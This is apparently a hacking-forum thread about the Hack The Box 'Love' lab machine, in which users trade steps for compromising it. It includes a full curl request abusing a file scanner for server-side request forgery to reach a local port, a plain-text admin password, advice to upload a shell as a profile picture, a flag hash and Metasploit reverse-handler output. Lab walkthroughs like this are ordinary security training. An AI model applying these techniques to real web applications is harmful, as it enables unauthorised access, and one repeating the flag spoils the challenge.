TUTORIAL HTB Love [DISCUSSION!!]
by En3rypt3D - May 01, 2021 at 07:29 PM
#37
(May 02, 2021 at 02:52 PM)Anaideia Wrote:
(May 02, 2021 at 10:48 AM)Orochimaru Wrote:
(May 01, 2021 at 10:36 PM)coolencyclopedia Wrote:
(May 01, 2021 at 10:15 PM)wizardhulk Wrote:
(May 01, 2021 at 10:07 PM)coolencyclopedia Wrote: can you guide step by step.
enter local url in staging.love.htb file scan "http://127.0.0.1:5000/"
admin credentials can be found there for http://love.htb/admin/
login in into http://love.htb/admin as admin
Update current user profile pic with your shell or create a user and thn do it. 
profit???

admin: @LoveIsInTheAir!!!!

says incorrect password.

How you got this password, I found the bcrypt and tried to decode using john I got no result yet :}

@LoveIsInTheAir!!!!

You can get the password by querying the port 5000, with the file scan from staging.love.htb

curl 'http://staging.love.htb/beta.php' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://staging.love.htb' -H 'Referer: http://staging.love.htb/beta.php' --data-raw 'file=http%3A%2F%2F127.0.0.1%3A5000&read=Scan+file'

Easier way is trick the file scanner with http://127.0.0.1:5000

Nice curl command though.
Reply
#38
(May 02, 2021 at 02:52 PM)Anaideia Wrote:
(May 02, 2021 at 10:48 AM)Orochimaru Wrote:
(May 01, 2021 at 10:36 PM)coolencyclopedia Wrote:
(May 01, 2021 at 10:15 PM)wizardhulk Wrote:
(May 01, 2021 at 10:07 PM)coolencyclopedia Wrote: can you guide step by step.
enter local url in staging.love.htb file scan "http://127.0.0.1:5000/"
admin credentials can be found there for http://love.htb/admin/
login in into http://love.htb/admin as admin
Update current user profile pic with your shell or create a user and thn do it. 
profit???

admin: @LoveIsInTheAir!!!!

says incorrect password.

How you got this password, I found the bcrypt and tried to decode using john I got no result yet :}

@LoveIsInTheAir!!!!

You can get the password by querying the port 5000, with the file scan from staging.love.htb

curl 'http://staging.love.htb/beta.php' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://staging.love.htb' -H 'Referer: http://staging.love.htb/beta.php' --data-raw 'file=http%3A%2F%2F127.0.0.1%3A5000&read=Scan+file'

Thanks I almost dead doing john and hashcat haha I will send respect for that.
Reply
#39
Writeup : https://hackingwebservice.wordpress.com/...e-writeup/

Hash :
aab42ca009fed69fa5ee57c52cf5bcf1

Happy hacking give reputation if possible
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Redistributing or uploading any Hidden Content to third party websites without the authorisation of the Owner of said content will result in a permanent ban.
Reply
#40
I have problems with metasploit:

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 10.10.14.30:4444
[*] Exploit completed, but no session was created.
Reply
#41
What about chasing this with sqlmap?
Im a still noob at this..
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Fortress Synacktiv (DISCUSSION) pheonix2021 15 2,722 50 minutes ago
Last Post: paulwatson42016
TUTORIAL Love Detailed Writeup Jockerjock 4 1,421 Yesterday at 01:58 PM
Last Post: Ownis
TRADING Hack The Box (Love) wizardhulk 2 413 May 05, 2021 at 02:19 PM
Last Post: craid616

 Users browsing this thread: 1 Guest(s)